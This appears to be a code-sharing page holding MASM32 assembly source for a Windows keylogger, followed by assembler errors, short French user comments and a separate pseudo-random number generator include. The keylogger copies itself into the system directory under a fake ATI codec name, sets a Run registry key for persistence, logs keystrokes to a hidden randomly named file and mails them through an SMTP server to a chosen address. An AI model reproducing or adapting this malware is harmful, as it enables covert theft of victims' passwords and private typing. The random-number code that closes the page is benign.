.386 .model flat,stdcall option casemap:none include \masm32\include\windows.inc include \masm32\include\user32.inc includelib \masm32\lib\user32.lib include \masm32\include\kernel32.inc includelib \masm32\lib\kernel32.lib include \masm32\include\rand.inc include \masm32\include\wininet.inc includelib \masm32\lib\wininet.lib include \masm32\include\wsock32.inc includelib \masm32\lib\wsock32.lib include \masm32\include\advapi32.inc includelib \masm32\lib\advapi32.lib Mys PROTO :DWORD Defini MACRO Name, Text:VARARG LOCAL lbl jmp lbl Name dd Text,0 lbl: ENDM WinMain proto :DWORD,:DWORD,:DWORD,:DWORD .DATA buffer db "smtp.wanadoo.fr",0 ClassName db "WinClasseAti",0 AppName db "AtiUpdate",0 NbByteWritten dd 0 Demain dd ? Fiere dd 0 Ordre dd ? Soleil db "\",0 Ainsi db "CodecAti4869.exe",0 HELO db "EHLO smtp.wanadoo.fr",13 ,10 ,0 MAIL_FROM db "MAIL FROM: <Cequelledi@aol.com>",13 ,10 ,0 RCPT_TO db "RCPT TO: <Email@wanadoo.fr>",13 ,10 ,0 ;<---mettez ici votre E@mail DONNEES db "DATA",13 ,10 ,0 TEXTE db " ",13 ,10 ,13 ,10 ,0 FIN_DONNEES db ".",13 ,10 ,0 RegistreRun db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0 FERME db "QUIT",13 ,10 ,0 wsadata WSADATA <> sin sockaddr_in <> Port dd 25 .DATA? hInstance HINSTANCE ? CommandLine LPSTR ? hFile dd ? Nom db 8 dup(?) Lettre db 1 dup(?) Information db 255 dup (?) sock dd ? buf db 255 dup (?) CheminSystem db 256 dup(?) Regarder db 256 dup(?) CheminExec db 256 dup(?) hReg dd ? ip dd ? 
.CODE start: invoke GetModuleFileName,0,addr Regarder,sizeof Regarder invoke GetSystemDirectory,addr CheminSystem,sizeof CheminSystem invoke lstrcat,addr CheminExec,addr CheminSystem invoke lstrcat,addr CheminExec,addr Soleil invoke lstrcat,addr CheminExec,addr Ainsi invoke CopyFile,addr Regarder,addr CheminExec,0 invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE, addr RegistreRun , 0, 00020000h+0002h+0004h, addr hReg invoke RegSetValueEx, hReg, ADDR Ainsi, 0, 1, addr CheminExec,sizeof CheminExec invoke RegCloseKey, hReg INVOKE GetTickCount INVOKE Randomize,eax invoke GetModuleHandle, NULL mov hInstance,eax invoke GetCommandLine ; mov CommandLine,eax invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT invoke ExitProcess, eax WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD LOCAL wc:WNDCLASSEX LOCAL msg:MSG LOCAL hwnd:HWND mov wc.cbSize,SIZEOF WNDCLASSEX mov wc.style, CS_HREDRAW or CS_VREDRAW mov wc.lpfnWndProc, OFFSET WndProc mov wc.cbClsExtra,NULL mov wc.cbWndExtra,NULL push hInstance pop wc.hInstance mov wc.hbrBackground,COLOR_WINDOW+1 mov wc.lpszMenuName,NULL mov wc.lpszClassName,OFFSET ClassName invoke LoadIcon,NULL,IDI_APPLICATION mov wc.hIcon,eax mov wc.hIconSm,eax invoke LoadCursor,NULL,IDC_ARROW mov wc.hCursor,eax invoke RegisterClassEx, addr wc invoke CreateWindowEx,NULL, ADDR ClassName, ADDR AppName, WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, hInst, NULL .WHILE TRUE invoke GetMessage, ADDR msg,NULL,0,0 .BREAK .IF (!eax) invoke TranslateMessage, ADDR msg invoke DispatchMessage, ADDR msg .ENDW mov eax,msg.wParam ret WinMain endp WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM Invoke SetTimer,hWnd,0,100, 0 .if uMsg == WM_TIMER invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE, addr RegistreRun , 0, 00020000h+0002h+0004h, addr hReg invoke RegSetValueEx, hReg, ADDR Ainsi, 0, 1, addr CheminExec,sizeof CheminExec invoke RegCloseKey, hReg invoke InternetGetConnectedState, ADDR Fiere, 
0 test eax, eax jnz @@on_line jmp @@exit @@on_line: Invoke GetAsyncKeyState, VK_A .if eax != 0 inc Ordre Defini Def,"A" invoke lstrcat,addr Information, addr Def push 0 push offset NbByteWritten push 1 push offset Def push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_B .if eax != 0 inc Ordre Defini Def1,"B" invoke lstrcat,addr Information, addr Def1 push 0 push offset NbByteWritten push 1 push offset Def1 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_C .if eax != 0 inc Ordre Defini Def2,"C" invoke lstrcat,addr Information, addr Def2 push 0 push offset NbByteWritten push 1 push offset Def2 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_D .if eax != 0 inc Ordre Defini Def3,"D" invoke lstrcat,addr Information, addr Def3 push 0 push offset NbByteWritten push 1 push offset Def3 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_E .if eax != 0 inc Ordre Defini Def4,"E" invoke lstrcat,addr Information, addr Def4 push 0 push offset NbByteWritten push 1 push offset Def4 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_F .if eax != 0 inc Ordre Defini Def5,"F" invoke lstrcat,addr Information, addr Def5 push 0 push offset NbByteWritten push 1 push offset Def5 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_G .if eax != 0 inc Ordre Defini Def6,"G" invoke lstrcat,addr Information, addr Def6 push 0 push offset NbByteWritten push 1 push offset Def6 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_H .if eax != 0 inc Ordre Defini Def7,"H" invoke lstrcat,addr Information, addr Def7 push 0 push offset NbByteWritten push 1 push offset Def7 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_I .if eax != 0 inc Ordre Defini Def8,"I" invoke lstrcat,addr Information, addr Def8 push 0 push offset NbByteWritten push 1 push offset Def8 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_J .if eax != 0 inc Ordre Defini Def9,"J" invoke lstrcat,addr Information, addr Def9 push 0 push offset 
NbByteWritten push 1 push offset Def9 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_K .if eax != 0 inc Ordre Defini Def10,"K" invoke lstrcat,addr Information, addr Def10 push 0 push offset NbByteWritten push 1 push offset Def10 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_L .if eax != 0 inc Ordre Defini Def11,"L" invoke lstrcat,addr Information, addr Def11 push 0 push offset NbByteWritten push 1 push offset Def11 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_M .if eax != 0 inc Ordre Defini Def12,"M" invoke lstrcat,addr Information, addr Def12 push 0 push offset NbByteWritten push 1 push offset Def12 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_N .if eax != 0 inc Ordre Defini Def13,"N" invoke lstrcat,addr Information, addr Def13 push 0 push offset NbByteWritten push 1 push offset Def13 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_O .if eax != 0 inc Ordre Defini Def14,"O" invoke lstrcat,addr Information, addr Def14 push 0 push offset NbByteWritten push 1 push offset Def14 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_P .if eax != 0 inc Ordre Defini Def15,"P" invoke lstrcat,addr Information, addr Def15 push 0 push offset NbByteWritten push 1 push offset Def15 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_Q .if eax != 0 inc Ordre Defini Def16,"Q" invoke lstrcat,addr Information, addr Def16 push 0 push offset NbByteWritten push 1 push offset Def16 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_R .if eax != 0 inc Ordre Defini Def17,"R" invoke lstrcat,addr Information, addr Def17 push 0 push offset NbByteWritten push 1 push offset Def17 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_S .if eax != 0 inc Ordre Defini Def18,"S" invoke lstrcat,addr Information, addr Def18 push 0 push offset NbByteWritten push 1 push offset Def18 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_T .if eax != 0 inc Ordre Defini Def19,"T" invoke 
lstrcat,addr Information, addr Def19 push 0 push offset NbByteWritten push 1 push offset Def19 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_U .if eax != 0 inc Ordre Defini Def20,"U" invoke lstrcat,addr Information, addr Def20 push 0 push offset NbByteWritten push 1 push offset Def20 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_V .if eax != 0 inc Ordre Defini Def21,"V" invoke lstrcat,addr Information, addr Def21 push 0 push offset NbByteWritten push 1 push offset Def21 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_W .if eax != 0 inc Ordre Defini Def22,"W" invoke lstrcat,addr Information, addr Def22 push 0 push offset NbByteWritten push 1 push offset Def22 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_X .if eax != 0 inc Ordre Defini Def23,"X" invoke lstrcat,addr Information, addr Def23 push 0 push offset NbByteWritten push 1 push offset Def23 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_Y .if eax != 0 inc Ordre Defini Def24,"Y" invoke lstrcat,addr Information, addr Def24 push 0 push offset NbByteWritten push 1 push offset Def24 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_Z .if eax != 0 inc Ordre Defini Def25,"Z" invoke lstrcat,addr Information, addr Def25 push 0 push offset NbByteWritten push 1 push offset Def25 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_SPACE .if eax != 0 inc Ordre Defini Def26," " invoke lstrcat,addr Information, addr Def26 push 0 push offset NbByteWritten push 1 push offset Def26 push hFile call WriteFile .endif .if Ordre == 100 mov Ordre,0 invoke WSAStartup,101h,addr wsadata ;initialise le socket invoke socket,AF_INET,SOCK_STREAM,IPPROTO_IP mov sock,eax mov sin.sin_family,AF_INET ;famille de socket invoke htons,Port ;port 25 mov sin.sin_port,ax invoke inet_addr,addr buffer mov ip,eax .if eax==INADDR_NONE invoke gethostbyname,addr buffer .if eax!=NULL mov eax,[eax+12] mov eax,[eax] mov eax,[eax] invoke inet_ntoa,eax .else jmp endit 
.endif .else invoke gethostbyaddr,addr ip,4,2 .if eax == 0 jmp endit .endif mov eax,[eax] .endif endit: invoke inet_addr, eax ;ip du smtp mov sin.sin_addr, eax invoke connect, sock, addr sin ,sizeof sin ;on se connecte invoke recv, sock, addr buf, sizeof buf, 0 ;et affiche la reponse ; HELO SERVER invoke Mys, addr HELO ;envoit HELO smtp.infonie.be invoke recv, sock, addr buf, sizeof buf, 0 ;invoke MessageBox,0,addr buf, addr HELO, MB_OK ; MAIL TO: invoke Mys, addr MAIL_FROM ;envoit MAIL FROM: invoke recv, sock, addr buf, sizeof buf, 0 ;invoke MessageBox,0,addr buf, addr MAIL_FROM, MB_OK ; RCPT TO: invoke Mys, addr RCPT_TO ;envoit RCPT TO: invoke recv, sock, addr buf, sizeof buf, 0 ;invoke MessageBox,0,addr buf, addr RCPT_TO, MB_OK ; DATA invoke Mys, addr DONNEES ;envoit DATA invoke recv, sock, addr buf, sizeof buf, 0 ;invoke MessageBox,0,addr buf, addr DONNEES, MB_OK invoke lstrcat,addr Information, addr TEXTE invoke Mys, addr Information ;envoit le text ; DATA invoke Mys, addr FIN_DONNEES ;envoit . invoke recv, sock, addr buf, sizeof buf, 0 ;invoke MessageBox,0,addr buf, addr FIN_DONNEES, MB_OK ; DATA invoke Mys, addr FERME ;envoit QUIT invoke recv, sock, addr buf, sizeof buf, 0 ;invoke MessageBox,0,addr buf, addr FERME, MB_OK mov Information,0 invoke closesocket,sock ;ferme le socket et quit .endif @@exit: .elseif uMsg == WM_CREATE INVOKE GetTickCount INVOKE Randomize,eax mov Ordre,0 mov Demain,0 GenereNom: INVOKE Rand,26 add al,97 mov Lettre,al invoke lstrcat,addr Nom, addr Lettre inc Demain cmp Demain,7 jng GenereNom invoke lstrcat,addr CheminSystem, addr Soleil invoke lstrcat,addr CheminSystem, addr Nom invoke CreateFile,ADDR CheminSystem,GENERIC_WRITE,FILE_SHARE_READ, 0,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0 mov hFile,eax .endif invoke DefWindowProc,hWnd,uMsg,wParam,lParam ret WndProc endp Mys proc SendStr : DWORD push edi mov edi, SendStr .WHILE TRUE .BREAK .IF (byte ptr [edi] == 0 ) invoke send, sock, edi, 1, 0 inc edi .ENDW pop edi ret Mys endp end start
error A2008: syntax error : endif
fatal error A1010: unmatched block nesting : .if-.repeat-.while
Ce code montre comment intercepter toutes les saisies au clavier à l'aide d'un hook... très instructif
Même pas capable de faire confiance !!!
J'ai honte !!!
Mais où va le monde !
Rand proto :DWORD ;Generates a number on [0,Max-1]
Randomize proto :DWORD ;Changes the seed for Rand
.const
; Constants for the 624-word generator implemented by Randomize and Rand.
N equ 624                       ; number of 32-bit state words that the procs index
M equ 397                       ; word offset of the second operand in Rand's state refresh
MATRIX_A equ 9908b0dfh          ; xored into a refreshed word when the combined value's low bit is set
TEMPERING_MASK_B equ 9d2c5680h  ; mask applied after the "shl 7" step of Rand's output stage
TEMPERING_MASK_C equ 0efc60000h ; mask applied after the "shl 15" step of Rand's output stage
UM equ 80000000h                ; selects the top bit of a state word
LM equ 7fffffffh                ; selects the low 31 bits of a state word
.data
; Index of the next state word Rand hands out. The initial value N+1 is the
; "never seeded" marker that Rand tests before seeding with its default.
mti dd (N+1)
MC dd 69069                     ; multiplier Randomize uses to fill the state table from the seed
.data?
; State table. NOTE(review): 2496 equals N*4, so this looks like a byte count
; written as a dword count (it reserves 2496 dwords, not 624). Confirm before
; shrinking it: the extra space may be hiding out-of-range accesses elsewhere.
mt dd 2496 dup(?)
.code
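;-----------------------------------------------------------------------
; Randomize proc Seed:DWORD
; Fills the state table: mt[0] = Seed, mt[i] = mt[i-1] * MC (low 32 bits)
; for i = 1 .. N-1, and leaves mti = N so the next Rand call refreshes the
; table before returning a value.
; In:    Seed  - 32-bit seed
; Out:   nothing meaningful in eax
; Clobb: eax, edx, flags (edi is saved and restored through USES)
; Note:  the whole state follows from the 32-bit seed, so the output is
;        predictable by anyone who knows or can guess the seed (for
;        example a tick count). Do not use it for keys, tokens, or
;        anything an adversary must not be able to reproduce.
;-----------------------------------------------------------------------
Randomize proc uses edi Seed:DWORD
    lea     edi, mt
    mov     eax, Seed
    mov     [edi], eax              ; mt[0] = Seed
    mov     mti, 1
@R: add     edi, 4                  ; advance to mt[mti]
    mul     MC                      ; eax = low 32 bits of previous word * MC; edx is overwritten
    mov     [edi], eax
    inc     mti
    cmp     mti, N
    jnz     @R                      ; stop after mt[N-1] has been written
    ret
Randomize endp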
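;-----------------------------------------------------------------------
; Rand proc Max:DWORD
; Returns the next generator output reduced modulo Max, i.e. a value in
; [0, Max-1]. Returns 0 when Max is 0 instead of raising a divide error.
; In:    Max   - exclusive upper bound
; Out:   eax   - pseudo-random value
; Clobb: ecx, edx, flags (ebx, esi, edi are saved and restored through USES)
; Regs:  edi = base of mt, esi = address of the word being processed
; Note:  not a cryptographic generator. The output is a fixed, invertible
;        function of the state, and the "div Max" reduction is slightly
;        biased unless Max divides 2^32. Use an OS-provided CSPRNG for
;        anything security relevant.
;-----------------------------------------------------------------------
Rand proc uses ebx esi edi Max:DWORD
    LOCAL Counter:DWORD

    lea     edi, mt
    .IF mti >= N                        ; all N words consumed (or never seeded)
        .IF mti == N+1
            INVOKE Randomize, 4357      ; never seeded: use the fixed default seed
            lea     edi, mt             ; reload the base; Randomize is not relied on to preserve edi
        .ENDIF
        mov     Counter, 0
        mov     esi, edi

        ; Words 0 .. N-M-1: mt[k] = mt[k+M] ^ (y >> 1) ^ (y & 1 ? MATRIX_A : 0)
        ; with y = (mt[k] & UM) | (mt[k+1] & LM).
@S:     mov     eax, [esi]
        and     eax, UM
        mov     ebx, [esi+4]
        and     ebx, LM
        or      eax, ebx
        mov     ecx, eax                ; keep y so its low bit can be tested
        shr     eax, 1
        mov     edx, esi
        add     edx, (M*4)
        mov     ebx, [edx]
        xor     eax, ebx
        and     ecx, 1
        .IF ecx
            xor     eax, MATRIX_A
        .ENDIF
        mov     [esi], eax
        add     esi, 4
        inc     Counter
        cmp     Counter, (N-M)
        jnz     @S

        ; Words N-M .. N-2: same step, second operand is mt[k+M-N] (negative offset).
@T:     mov     eax, [esi]
        and     eax, UM
        mov     ebx, [esi+4]
        and     ebx, LM
        or      eax, ebx
        mov     ecx, eax
        shr     eax, 1
        mov     edx, esi
        add     edx, ((M-N)*4)
        mov     ebx, [edx]
        xor     eax, ebx
        and     ecx, 1
        .IF ecx
            xor     eax, MATRIX_A
        .ENDIF
        mov     [esi], eax
        add     esi, 4
        inc     Counter
        cmp     Counter, (N-1)
        jnz     @T

        ; Last word, esi -> mt[N-1]: y wraps around to mt[0]. The original
        ; skipped building y here and reused eax/ecx left over from the
        ; previous iteration, so mt[N-1] was refreshed from the wrong value.
        mov     eax, [esi]
        and     eax, UM
        mov     ebx, [edi]
        and     ebx, LM
        or      eax, ebx
        mov     ecx, eax
        shr     eax, 1
        xor     eax, [edi + (M-1)*4]
        and     ecx, 1
        .IF ecx
            xor     eax, MATRIX_A
        .ENDIF
        mov     [esi], eax
        mov     mti, 0
    .ENDIF

    ; Fetch mt[mti] and advance the index.
    mov     esi, edi
    mov     eax, mti
    inc     mti
    shl     eax, 2                      ; word index -> byte offset
    add     esi, eax
    mov     eax, [esi]

    ; Output stage: y ^= y>>11; y ^= (y<<7)&B; y ^= (y<<15)&C; y ^= y>>18.
    mov     ebx, eax
    shr     eax, 11
    xor     ebx, eax
    mov     eax, ebx
    shl     eax, 7
    and     eax, TEMPERING_MASK_B
    xor     ebx, eax
    mov     eax, ebx
    shl     eax, 15
    and     eax, TEMPERING_MASK_C
    xor     ebx, eax
    mov     eax, ebx
    shr     eax, 18
    xor     eax, ebx

    ; Reduce to [0, Max-1]; a zero bound would fault in div, so return 0.
    mov     ecx, Max
    .IF ecx == 0
        xor     eax, eax
    .ELSE
        xor     edx, edx                ; div takes edx:eax as the dividend
        div     ecx
        mov     eax, edx                ; remainder is the result
    .ENDIF
    ret
Rand endp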